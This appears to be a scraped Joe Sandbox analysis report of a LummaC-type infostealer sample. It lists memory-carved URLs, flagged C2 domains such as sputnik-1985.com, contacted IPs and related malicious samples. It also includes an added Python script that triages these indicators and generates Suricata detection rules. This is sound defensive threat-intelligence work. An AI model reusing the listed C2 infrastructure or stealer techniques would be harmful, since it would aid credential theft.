                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/skin_1/modaPfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://x1.c.lencr.org/0filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://x1.i.lencr.org/0filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://bashfulacid.lat/pifilename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                          unknown
                                                                                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfilename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=efilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://sputnik-1985.com:443/apifilename.exe, 00000000.00000002.1532096286.0000000000945000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  https://steamcommunity.com/workshop/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://support.mozilla.org/products/firefoxgro.allfilename.exe, 00000000.00000003.1435043330.00000000034F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://store.steampowered.com/legal/filename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=enfilename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icofilename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&afilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=englfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://sputnik-1985.com/apiSfilename.exe, 00000000.00000003.1468834713.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532336714.00000000009BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                unknown
                                                                                                                                                                                http://upx.sf.netAmcache.hve.4.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://store.steampowered.com/filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://sputnik-1985.com//filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.pngfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://sputnik-1985.com/apiffilename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://bashfulacid.lat/pic1filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.giffilename.exe, 00000000.00000003.1395609830.0000000000924000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://ac.ecosia.org/autocomplete?q=filename.exe, 00000000.00000003.1406975397.0000000003075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://sputnik-1985.com/apipfilename.exe, 00000000.00000003.1468864624.0000000003011000.00000004.00000800.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532779820.0000000003014000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=VsdTzPa1YF_Y&l=efilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://sputnik-1985.com/apilfilename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQfilename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://sputnik-1985.com/2Lfilename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1446925420.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1458208599.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1468927237.000000000097B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1433413919.000000000097B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crt.rootca1.amazontrust.com/rootca1.cer0? | filename.exe, 00000000.00000003.1433939021.000000000304E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://sputnik-1985.com/apixO | filename.exe, 00000000.00000003.1395750412.000000000097C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://store.steampowered.com/account/cookiepreferences/ | filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=en | filename.exe, 00000000.00000002.1532779820.0000000003010000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/mobile | filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/ | filename.exe, 00000000.00000003.1395594246.0000000003011000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENET, US | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-AS, US | false
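The URL and IP tables above give a defender two contacted addresses and a handful of URLs carved from process memory, and the ASN column already tells the important part of the story: both IPs sit in shared CDN space. The following Python is an added example, not part of the Joe Sandbox report or its tooling, showing how the indicators would be triaged before they reach a blocklist: keep as indicators only hosts that lack an established reputation or carry an AV verdict, refuse IP-level blocking where the ASN is Cloudflare or Akamai anycast capacity, use the related-sample pivots further down the page to confirm that the C2 domain moves between Cloudflare addresses, and emit Suricata DNS-query and TLS-SNI rules for the surviving domain. The sample records are transcribed from the report's tables; the CDN ASN set, the SID range and the Suricata 5+ sticky-buffer syntax are assumptions made for this example.

```python
"""Triage of the network indicators in the sandbox report above (added example)."""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Assumption: ASNs whose address space is shared anycast CDN capacity. One such IP
# fronts many unrelated tenants, so blocking it is collateral damage, not defence.
SHARED_CDN_ASNS = {13335: "CLOUDFLARENET", 16625: "AKAMAI-AS"}


@dataclass(frozen=True)
class UrlHit:
    url: str
    malicious: bool        # the report's Malicious column
    reputation: str        # the report's Reputation column ("high", "unknown", ...)
    av_verdict: str = ""   # the report's Antivirus Detection column, if any


@dataclass(frozen=True)
class IpHit:
    ip: str
    domain: str
    asn: int
    asn_name: str


# Constructed from the URL and IP tables of the report (memory-carved URLs kept
# verbatim, trailing bytes included; only the host part is used below).
URLS = [
    UrlHit("http://crt.rootca1.amazontrust.com/rootca1.cer0?", False, "high"),
    UrlHit("https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp", False, "high"),
    UrlHit("https://sputnik-1985.com/apixO", False, "unknown", "Avira URL Cloud: malware"),
    UrlHit("http://store.steampowered.com/account/cookiepreferences/", False, "high"),
    UrlHit("https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=en", False, "high"),
    UrlHit("https://store.steampowered.com/mobile", False, "high"),
    UrlHit("https://steamcommunity.com/", False, "high"),
]
IPS = [
    IpHit("104.21.48.1", "sputnik-1985.com", 13335, "CLOUDFLARENET"),
    IpHit("104.102.49.254", "steamcommunity.com", 16625, "AKAMAI-AS"),
]
# Domain -> IPs recorded for it in the report's related-sample pivots.
RELATED = {
    "sputnik-1985.com": ["104.21.48.1", "104.21.80.1", "104.21.64.1", "104.21.96.1",
                         "104.21.80.1", "104.21.48.1", "104.21.96.1", "104.21.112.1"],
    "steamcommunity.com": ["104.102.49.254"] * 8,
}


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def suspicious_hosts(urls):
    """Hosts that deserve an indicator: flagged malicious, carrying an AV verdict,
    or lacking an established reputation. High-reputation hosts (Steam, Amazon
    Trust Services) stay in the report as context only."""
    return {host_of(u.url) for u in urls
            if u.malicious or u.av_verdict or u.reputation.lower() != "high"}


def ip_blocking_advice(ips):
    """Per contacted IP: 'block' if it is plausibly dedicated infrastructure,
    'domain-only' if it sits in a shared-CDN ASN."""
    advice = {}
    for h in ips:
        if h.asn in SHARED_CDN_ASNS:
            advice[h.ip] = ("domain-only",
                            f"AS{h.asn} {h.asn_name} is shared CDN space; key on {h.domain}")
        else:
            advice[h.ip] = ("block", f"AS{h.asn} {h.asn_name}")
    return advice


def ip_churn(related):
    """Distinct IPs per domain across related reports. A domain that moves between
    a CDN's anycast addresses confirms that the IP is not a stable indicator."""
    return {domain: len(set(ips)) for domain, ips in related.items()}


def suricata_rules(hosts, base_sid=9_000_001):
    """DNS-query and TLS-SNI rules per host (Suricata 5+ sticky-buffer syntax;
    the SID range is an assumption for this example)."""
    rules = []
    for i, host in enumerate(sorted(hosts)):
        sid = base_sid + 2 * i
        rules.append(f'alert dns $HOME_NET any -> any any (msg:"LummaC C2 DNS query {host}"; '
                     f'dns.query; content:"{host}"; nocase; endswith; sid:{sid}; rev:1;)')
        rules.append(f'alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:"LummaC C2 TLS SNI {host}"; '
                     f'tls.sni; content:"{host}"; nocase; endswith; sid:{sid + 1}; rev:1;)')
    return rules


if __name__ == "__main__":
    hosts = suspicious_hosts(URLS)
    print("indicator hosts:", sorted(hosts))
    for ip, (action, why) in ip_blocking_advice(IPS).items():
        print(f"{ip}: {action} ({why})")
    print("distinct IPs per domain in related reports:", ip_churn(RELATED))
    print("\n".join(suricata_rules(hosts)))
```

Run as a script it leaves sputnik-1985.com as the only indicator host, marks both IPs domain-only, and reports five distinct Cloudflare addresses for the C2 domain against one for steamcommunity.com, which is why the rules key on the DNS query name and TLS SNI rather than on either address.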
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587439
Start date and time: 2025-01-10 11:35:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: filename.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@13/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 45
• Number of non-executed functions: 200
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.189.173.21, 13.107.246.45, 20.190.159.64, 20.109.210.53, 20.3.187.198, 20.12.23.50
• Excluded domains from analysis (whitelisted): www.bing.com, watson.events.data.microsoft.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollectorcommon.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analysed; the report is missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:36:09 | API Interceptor | 9x Sleep call for process: filename.exe modified
05:36:24 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.48.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | twirpx.org/administrator/index.php
104.21.48.1 | SN500, SN150 Spec.exe | malicious | FormBook | www.antipromil.site/7ykh/
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | https://form.fillout.com/t/emEtLm993dus | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Invoice_R6GPN23V_TransactionSuccess.html.html | malicious | HTMLPhisher | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DwyWG_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLQ6-2Bsxhj60Ehn0XDEyVD6MCEZ1gioYU2lwgwkCuP2dHRX-2FYdZnQ31dEdwKW37GtXYj9HmZ1F0YrZWwSELmaO5K7noqwYAhu2QGcGqOtQYdjShoJMVTWOe6BTzZXQxib8Y6rd4SX-2BUwZMt-2BbgPIpal6PcS8i4PCSiFy8RF-2Ftt22Wpj713n23BIU6an4375YDP3 | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2BpuOeo6wXhYyQnN5Dmhl9EwD4jJy2QucAxD5PJ8TFaAtq5-2Fa2JLywFyD22uAsFmhYjQLp65IuicFXReMolU22hvgQ-2B1S2bacC3gnzhuRxI8SAkOsPFFxOcYEiSSZTqVyp3m1OxPmLRrTi1o5-2FZom3YCyV1EUto77Rrvablg0dLCkGGW0ncnt-2B7IgK6LBBZRD7ITvGmpDjZtTYsz0I1qKiLzZdNfmubxarfJC5-2BcEqOw-2Ft-2FbdrugnVMUWHAHioUxjwvqr4QWKZSVt-2BeoNRvP2Adsk-2FRWXyTy-2FNsOG5tm8W5iiSHTNAe6b2ve-2F-2FMif4OPRLC2jk2zIHDBodMQqimJe7S-2B0c0a6VcurrTf-2BSSIJw1siTQylKaBjy96o6v7aWNACMPOJmDH5ybp8Hfg60OUEGx1ZLebRMpxX9k9AP7u40PlQ7YN0etELZUsiTbXY4PcX2P96RfnnTH8k4gdprbyM68BwIDNXqkSpWupXgXawXvLifC6eFYgMzHs5EFbgb5u6HEHo2__tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcL7zwYzcSR3guHWoKhXDu5EQ7SXJZpci4hCmpp1REa7W1YXEAS6JqnE9LrlFK998LZ271LMIRubQetxBOsHxh3FfsHQej0U45DqU0JnGYKUA9waD6Ny-2BL9vchurlVMDvBupSQHaqHAKs87lmzkMbvNLGI-2BMPx7o1UJrTBuhk-2BVx-2FdFVsZL4Uf2HUcBJTS73hyi | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgZRhaAY0f4dRd5bGXo8w1-2B5SPZj6mt6bkINmYNA1f4blf-2F2qp6pSrdQgqdtKPVZlFfsGiBd9L9S-2BVNmfUTaZ-2Bp0zWbjdQ23pm6OHkVsvPYDi1myQ0pU4BHbfSebmhjQAIDDVMgAvG7Znw7Pr8RLFA8HEKUDF6j4JiiZ3slfATgGRu3-2BdlWbffHNdZW8UBc7QW6Nxd08b90zhz6-2FhInZrSp1J-2Fh9yU6gsolKI10c6pp1uA-2FrYRI2h9aMn65O5NvFrP-2Fc-2BjlCyvznYBIXNfkBGEguSmRbREbgogGbx0CjJc9kfZpcF-2F4T3W7floa7RxJ5-2BKjbFDYD7FnGxTCmOAt-2BDLn5J0y5KvJMT3qFWKyQo5DJ5ru0B7ksJyMiI6L18xz5XP2GRtxbC7dwfszL4xopys7uMk6wzOFXTrTU9jYi2ZvQxqCtOzUddy1WGVe8msfQF8x3k3Ejw4p6mGzrKR8wOZXnO3uVw5n8j0tNkc31-2F1y7FsWAGygTmAHNV4DJiUXG3-2Foq61jCXRLG1PMMCZ97ToDeMjE9XjfX-2Bb4NXrzqR3tgw-3D-3DrgFz_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419Oh5WFVYobMs1ROnIPWGGcLui8UPBZcrEcBQ64UpH2s9-2FDpSu9qfcgYFRQKTYsD5OOP7p7kgdevUOf60UO0BtzRorOOVdIMlEbf0g38VGeCmtkP8At2J-2BxKEtoZ2O48KqLdUMGUmxH4Esb-2BPRc25uZJoq4Qo0YWw9j31285luIdhLwnz-2B9RfofSABy36tB5aPmDcVeLn5C5N5AJkqjfepa6 | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://email.analystratings.net/ls/click?upn=u001.WeKo-2BCuHku2kJmVIsYmGxteRO-2BqdkFdZns7E8OZ0trgBe3vvPhUi3NCctiT7ICCnQ-2FY8o5rhg4URlGJ-2FvsNaBLrMZH2YOUKWM-2BCE-2FXqUBn4SuSDNO43ZHONlcfV0u69WPaY48i3uh3m8lqIzkUcMcKGiml1g6PtP2N9Fq73ADmecSkBDQ1wDesGGu-2Bg3LC1PY31AnFBjTo5itfBoUzfV1y-2FNuV7ub4JBfgFfFwbfDCVw04z2QHPGmvaTuYBRiOw1Tpn5jhya1bpe-2FZKFIvw6DpoIa015fiQnAkr21qCIGDz3kcWaHiPPoAcEbgrIJQtXRwdHoKOAHjnLbHeTfYxioE2jQ-2BKzgO6L-2FLiLt79tmJXX2KYx8D6DTv7nI91sFKT8dXMJM0DazaslrneD4lIUneNyaGARqqUVvrSB7-2BzgxAL-2FuXFyd1qjf-2FnnaV5h661BgCBEWKyZBkPjSGhvc635VlrPtfR5g3T0pDVRqQ8o-2Fg4-3DfYwI_tUVFAbhJxF44ufbifaYzyYApcQooCC4WsuZoiwe419PER4av1iPHZIu7rMCH4g59O-2FpVm-2BPXLGfx0fQIDbM830SEyalx7CL7LS5G2wzbNPhsJ2FagkVeT-2FvL4PXhjlJE5YFKw59He2Ja9QVSEHwhUEJm-2BBDxFee6A4QFWAIxMlxI8kis-2B4bFFLDszJAKx313jD-2F4FRd82vUXuacU2lSKZ4Ah2gmv6sbaeoxYrNwq4bbw0e0DJ7EzH1nxfqSXJpTz | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://api.myuhchvision.com/ | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | PrefetchParser.exe | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | http://loginmicrosoftonline.Ssc.qnkproductions.com/cache/css/Ssc/mwoods@ssc.nsw.gov.au | malicious | Unknown | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://199.188.109.181 | malicious | Unknown | 13.107.246.45
sputnik-1985.com | anti-malware-setup.exe | malicious | LummaC | 104.21.48.1
sputnik-1985.com | appFile.exe | malicious | LummaC Stealer | 104.21.80.1
sputnik-1985.com | [UPD]Intel_Unit.2.1.exe | malicious | LummaC | 104.21.64.1
sputnik-1985.com | Installer.exe | malicious | LummaC, PureLog Stealer | 104.21.96.1
sputnik-1985.com | Setup.exe | malicious | LummaC | 104.21.80.1
sputnik-1985.com | BnJxmraqlk.exe | malicious | LummaC, PrivateLoader | 104.21.48.1
sputnik-1985.com | file.exe | malicious | Amadey, Babadeda, LummaC Stealer, Poverty Stealer, PureLog Stealer | 104.21.96.1
sputnik-1985.com | NjFiIQNSid.exe | malicious | LummaC | 104.21.112.1
steamcommunity.com | 1.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | SensorExpo.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | anti-malware-setup.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | appFile.exe | malicious | LummaC Stealer | 104.102.49.254
steamcommunity.com | cache_registerer.exe | malicious | LummaC Stealer | 104.102.49.254
steamcommunity.com | Invoice.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | NvOxePa.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | h3VYJaQqI9.exe | malicious | LummaC | 104.102.49.254
steamcommunity.com | P2V7Mr3DUF.exe | malicious | LummaC |
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            v3tb7mqP48.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            CLOUDFLARENETUSanti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            https://we.tl/t-fnebgmrnYQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.26.0.90
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            Undelivered Messages.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.84.200
                                                                                                                                                                                                            driver.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                            • 162.159.137.232
                                                                                                                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                            • 104.20.4.235
                                                                                                                                                                                                            http://www.efnhdh.blogspot.mk/Get hashmaliciousGRQ ScamBrowse
                                                                                                                                                                                                            • 172.67.12.83
                                                                                                                                                                                                            gem1.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                            • 104.26.12.205
                                                                                                                                                                                                            http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.21.11.245
                                                                                                                                                                                                            RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                            • 104.21.80.1
                                                                                                                                                                                                            AKAMAI-ASUS1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.209.153.127
                                                                                                                                                                                                            http://postman.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.102.43.106
                                                                                                                                                                                                            https://sanctionssearch.ofac.treas.govGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.49.251.37
                                                                                                                                                                                                            Fantazy.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 104.81.98.224
                                                                                                                                                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 184.28.181.149
                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            a0e9f5d64349fb13191bc781f81f42e11.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            SensorExpo.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            anti-malware-setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
                                                                                                                                                                                                            • 104.102.49.254
                                                                                                                                                                                                            cache_registerer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                            • 104.21.48.1
